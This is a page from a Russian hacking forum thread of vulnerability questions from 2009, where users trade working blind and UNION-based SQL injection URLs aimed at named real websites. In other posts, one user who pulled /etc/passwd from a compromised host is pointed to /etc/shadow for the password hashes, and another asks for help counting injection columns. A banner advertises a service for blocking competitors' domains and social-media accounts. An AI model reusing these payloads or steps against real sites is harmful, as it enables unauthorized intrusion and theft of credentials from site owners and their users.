Форум АНТИЧАТ - Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 867 из 1393

867

Опции темы

Поиск в этой теме

Опции просмотра

#8661

25.08.2009, 12:07

nemaniak

Участник форума

Регистрация: 10.06.2008

Сообщений: 201

Провел на форуме:
1174919

Репутация: 229

Цитата:

Сообщение от [x60]unu

можно т.к времени крутить сейчас нет скину просто слепую
http://www.royalgroup.it/ita/offerte_speciali.htm?id_prodotto_sel=64/**/aNd/**/substring(version(),1,1)=5--&id_albergo=1179

Попробуй покрутить blind sql т.к стоит некая фильтрация запроса я так понял что union+select

ничего не происходит, перебрасывает лишь на verticalbooking.com, причем при любых значениях...

#8662

25.08.2009, 13:15

ILYAtirtir

Участник форума

Регистрация: 25.04.2007

Сообщений: 176

Провел на форуме:
1957988

Репутация: 739

Отправить сообщение для ILYAtirtir с помощью ICQ

Цитата:

http://www.royalgroup.it/modulo_eventi_gruppo/6242_Offerta_Speciale_Meeting_a_Napoli.htm?id_sezi one=6394+and+substring(version(),1,1)=5

Вот тут работает,5ая ветка.

#8663

25.08.2009, 13:49

LokbatanLi

Участник форума

Регистрация: 24.08.2009

Сообщений: 172

Провел на форуме:
1535319

Репутация: -16

Отправить сообщение для LokbatanLi с помощью ICQ

http://www.advantage.am/newsArticle.aspx?id=95'a

a 4to taoe eto?? s nim 4tota zdelat mojno??[I]

#8664

25.08.2009, 14:59

ILYAtirtir

Участник форума

Регистрация: 25.04.2007

Сообщений: 176

Провел на форуме:
1957988

Репутация: 739

Это не MSSQL:

Цитата:

Microsoft .NET Framework Version:2.0.50727.3082; ASP.NET Version:2.0.50727.3082

#8665

25.08.2009, 15:45

LokbatanLi

Участник форума

Регистрация: 24.08.2009

Сообщений: 172

Провел на форуме:
1535319

Репутация: -16

a 4to mojno zdelat??[I]

#8666

25.08.2009, 16:31

Komyak

Участник форума

Регистрация: 15.01.2009

Сообщений: 158

Провел на форуме:
469704

Репутация: 26

Проблема глупая, но ещё не сталкивался. Стянул с хоста файл- "passwd" соответственно в нём логины такого вида

Цитата:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
test:x:0:0:test:/root:/bin/bash
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:

И перечисляются все пользователи. А теперь глупый вопрос- пароли только подбирать или они на хосте где-то валяются?

#8667

25.08.2009, 16:49

~~it's my~~

Banned

Регистрация: 29.09.2007

Сообщений: 512

Провел на форуме:
4038468

Репутация: 1224

Отправить сообщение для it's my с помощью ICQ

Цитата:

Сообщение от Komyak

Проблема глупая, но ещё не сталкивался. Стянул с хоста файл- "passwd" соответственно в нём логины такого вида

И перечисляются все пользователи. А теперь глупый вопрос- пароли только подбирать или они на хосте где-то валяются?

/etc/shadow

#8668

25.08.2009, 18:26

HAXTA4OK

Reservists Of Antichat - Level 6

Регистрация: 15.03.2009

Сообщений: 560

Провел на форуме:
4358210

Репутация: 2017

Цитата:

Сообщение от it's my

/etc/shadow

только если ты не руут то врятли получиш к ним доступ

#8669

25.08.2009, 18:30

~~it's my~~

Banned

Регистрация: 29.09.2007

Сообщений: 512

Провел на форуме:
4038468

Репутация: 1224

Цитата:

Сообщение от HAXTA4OK

только если ты не руут то врятли получиш к ним доступ

на вопрос ответил, и ладно.

#8670

26.08.2009, 13:57

bleeep

Новичок

Регистрация: 01.02.2009

Сообщений: 5

Провел на форуме:
41189

Репутация: 0

Помогите разобраться, пытаюсь провести инъекцию но не могу определить количество полей сделал запрос вот такой www.sait.ru/profile.php?id=-1+union+select+1-- выдал вот такую ошибку

Цитата:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '.`st_id` = `ff_users`.`st_id` AND `ff_status`.`lng_id` = 1' at line 55 file:/var/www/site.ru/profile.php line:186

Пытался перебирать поля дошел до 30 и все равно тоже самое((((Help me((

Страница 867 из 1393

867

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход